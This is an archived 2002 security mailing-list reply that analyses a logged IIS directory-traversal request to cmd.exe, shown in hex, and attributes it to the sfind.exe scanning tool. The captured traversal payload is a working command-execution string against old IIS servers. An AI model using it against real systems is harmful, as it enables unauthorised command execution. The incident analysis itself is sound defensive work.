Re: Unicode worm?

From: pjat_private
Date: Fri Aug 23 2002 - 04:43:25 PDT

  • Next message: seren geti: "BAD TRAFFIC 0 ttl"

    I think the single-request attack you describe corresponds to this payload:
    
    06/17/02-18:12:39.590684 192.84.105.44:2468 -> X.X.X.X:80
    TCP TTL:108 TOS:0x0 ID:3615 IpLen:20 DgmLen:99 DF
    ***AP*** Seq: 0xC14916B  Ack: 0xC6B3FB9C  Win: 0x40B0  TcpLen: 20
    47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
    32 35 35 63 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  255c%255c../winn
    74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
    78 65 3F 2F 63 2B 64 69 72 0D 0A                 xe?/c+dir..
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    
    If Unicode translation is applied %255c%255c is seen as %5c%%5c,
    
    This request is sent by the unicode option of the sfind.exe tool. Sfind.exe
    origins from China, I have seen it used in different toolkits for
    semi-automated establishment of Warez "FXP" servers on vulnerable IIIS
    servers, see http://www.esec.dk/pubstro.pdf
    
    best regards
    Peter Jelver
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Fri Aug 23 2002 - 10:08:13 PDT